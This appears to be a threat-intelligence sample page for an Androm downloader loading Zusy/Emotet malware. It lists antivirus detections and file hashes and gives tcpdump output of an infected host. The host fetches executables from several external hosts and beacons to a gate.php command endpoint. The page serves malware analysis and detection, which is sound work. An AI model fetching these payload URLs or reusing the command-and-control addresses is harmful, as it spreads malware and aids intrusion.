Androm Trojan Downloader Loads Zusy Emotet Banking Trojan Malware PCAP file download traffic sample az.exe 11.exe

Download Attachments

  • 1 pcap nice
    Date added: January 26, 2018 5:55 am Added by: admin File size: 64 KB Downloads: 27
50 engines detected this file
SHA-256 5831264367b6ee1636606b2d9f46111cb7ab4b3b007e49e2f921df5f7d484f06
File name output.112714662.txt
File size 128 KB
Last analysis 2018-01-24 18:48:00 UTC
Community score -1

VBA32

Backdoor.Androm

VIPRE

Trojan.Win32.Generic!BT

ViRobot

Trojan.Win32.Agent.131072.EN

Webroot

W32.Trojan.Emotet

37 engines detected this file
SHA-256 b134507e22448a801b8a6d1fa6bc32a7d4b389afb15ec721b83e24bdde2e61e1
File name az.exe
File size 409.5 KB
Last analysis 2018-01-22 06:22:47 UTC

Endgame

malicious (high confidence)

eScan

Gen:Variant.Zusy.272363

ESET-NOD32

a variant of Win32/Kryptik.GBQS

F-Secure

Gen:Variant.Zusy.272363

2018-01-25 23:56:34.218090 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [P.], seq 0:512, ack 1, win 256, length 512: HTTP: GET /bot/Miner/bin/Release/LoaderBot.exe HTTP/1.1
E..(T.@…O@…fm.$..5.P….@p{.P….X..GET /bot/Miner/bin/Release/LoaderBot.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 109.234.36.233
Connection: Keep-Alive

2018-01-25 23:56:34.314369 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 2921, win 256, length 0
E..(T.@…Q?…fm.$..5.P….@p.GP…A………
2018-01-25 23:56:34.315369 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 5841, win 256, length 0
E..(T.@…Q>…fm.$..5.P….@p..P…6o……..
2018-01-25 23:56:34.407529 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 8761, win 256, length 0
E..(T.@…Q=…fm.$..5.P….@p..P…+………
2018-01-25 23:56:34.408132 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 11681, win 256, length 0
E..(T.@…Q<…fm.$..5.P….@p..P………….
2018-01-25 23:56:34.412251 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 16061, win 256, length 0
E..(T.@…Q;…fm.$..5.P….@p..P………….
2018-01-25 23:56:34.412445 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 17138, win 252, length 0
E..(T.@…Q:…fm.$..5.P….@p..P…
R……..
2018-01-25 23:56:56.788410 IP 192.168.1.102.53307 > 199.188.200.47.80: Flags [S], seq 1611515500, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4W(@…Q….f…/.;.P`..l……..+……………
2018-01-25 23:56:56.879346 IP 192.168.1.102.53307 > 199.188.200.47.80: Flags [.], ack 390261784, win 256, length 0
E..(W)@…Q….f…/.;.P`..m.B..P…bx……..
2018-01-25 23:56:56.892069 IP 192.168.1.102.53307 > 199.188.200.47.80: Flags [P.], seq 0:492, ack 1, win 256, length 492: HTTP: GET /yestogocrypt.exe HTTP/1.1
E…W*@…O….f…/.;.P`..m.B..P…….GET /yestogocrypt.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: gg.usdipc.com
Connection: Keep-Alive

2018-01-25 23:57:14.089718 IP 192.168.1.102.53308 > 179.43.147.227.80: Flags [P.], seq 0:487, ack 1, win 256, length 487: HTTP: GET /exe/11.exe HTTP/1.1
E…..@……..f.+…<.P;ln6.J.0P….O..GET /exe/11.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 179.43.147.227
Connection: Keep-Alive

2018-01-25 23:57:25.721761 IP 192.168.1.102.53310 > 179.43.147.227.80: Flags [P.], seq 0:136, ack 1, win 256, length 136: HTTP: POST /1/gate.php?1CEEA5ED34393712659782 HTTP/1.1
E…..@….C…f.+…>.P|……sP…. ..POST /1/gate.php?1CEEA5ED34393712659782 HTTP/1.1
Host: 179.43.147.227
Pragma: no-cache
Content-type: text/html
Connection: close

2018-01-25 23:57:25.838993 IP 192.168.1.102.53310 > 179.43.147.227.80: Flags [.], ack 192, win 255, length 0
E..(..@……..f.+…>.P|……2P………….
2018-01-25 23:57:25.845862 IP 192.168.1.102.53310 > 179.43.147.227.80: Flags [F.], seq 136, ack 192, win 255, length 0
E..(..@……..f.+…>.P|……2P………….
2018-01-25 23:57:25.871760 IP 192.168.1.102.53311 > 179.43.147.227.80: Flags [S], seq 3700082443, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..f.+…?.P……………………….
2018-01-25 23:57:25.979314 IP 192.168.1.102.53311 > 179.43.147.227.80: Flags [.], ack 11382739, win 256, length 0
E..(..@……..f.+…?.P……..P………….
2018-01-25 23:57:25.985021 IP 192.168.1.102.53311 > 179.43.147.227.80: Flags [P.], seq 0:155, ack 1, win 256, length 155: HTTP: POST /1/gate.php?1CEEA5ED34393712659782 HTTP/1.1
E…..@….+…f.+…?.P……..P…….POST /1/gate.php?1CEEA5ED34393712659782 HTTP/1.1
Host: 179.43.147.227
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 9

2018-01-25 23:57:27.861644 IP 192.168.1.102.53316 > 179.43.147.227.80: Flags [P.], seq 0:112, ack 1, win 256, length 112: HTTP: GET /exe/az.exe HTTP/1.1
E….2@……..f.+…D.P”..`=..bP… …GET /exe/az.exe HTTP/1.1
Host: 179.43.147.227/exe/az.exe
Pragma: no-cache
Content-type: text/html
Connection: close

 

Share

Leave a Reply